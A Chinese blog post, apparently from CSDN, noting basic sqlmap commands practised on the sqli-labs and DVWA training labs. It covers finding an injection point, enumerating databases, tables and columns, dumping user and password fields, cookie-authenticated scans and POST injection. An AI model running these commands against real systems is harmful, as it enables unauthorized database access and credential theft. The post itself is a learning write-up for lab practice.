sqlmap基本用法

最近处于查缺补漏阶段,再重温一遍sqlmap…

写的都是sqlmap最最最基本用法记录(虽然现在能用sqlmap做的题不多了…

 

我这里对sqli-labs-master第一关进行测试(文字是Windows跑sqlmap命令,图片演示使用的是kali自带的sqlmap)

 

1、检测注入点

使用-u参数进行设置注入点URL,如果要指定注入的参数,可以使用-p,这里只有一个注入点也可不加。

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -p id

可以看到存在GET的布尔盲注

Windows系统 Apache2.4.23 PHP5.2.17

 

2、获取数据库

使用--dbs获取数据库列表

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -p id --dbs

 

3、获取所有的表

使用-T指定要获取字段的表名,使用--columns来获取字段列表。

获取dvwa数据库的表,使用-D指定数据库,使用--tables参数来获取表列表。

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -p id -D dvwa --tables

4、获取字段

使用-T指定要获取字段的表名,使用--columns来获取字段列表。

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -p id -D dvwa -T users --columns

5、获取字段内容

使用-C指定要获取内容的字段列表,多个字段使用逗号分隔,使用--dump来获取内容。

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?Submit=Submit&id=2" -p id -D dvwa -T users -C user,password --dump

6、数据保存

SQLMap自动将数据保存了下来,通过提示信息我们可以看出来是保存到了

7、设置cookie

这里用的是dvwa的实验环境

使用--cookie指定使用的cookie信息,这个cookie可以burpsuite抓包获取。

(注意这里url和cookie都需要加引号)

python sqlmap.py -u "http://192.169.5.66:8081/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit#" -p id --cookie "security=low; PHPSESSID=61hgkv8hncgclpmu0fbngcakg6" --dbs

8、POST注入

此处以sqli-labs-master第十一关演示,点击Submit提交数据,bp截取登陆数据包

将数据包内容复制下来保存成txt文件

python sqlmap.py -r 11.txt

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值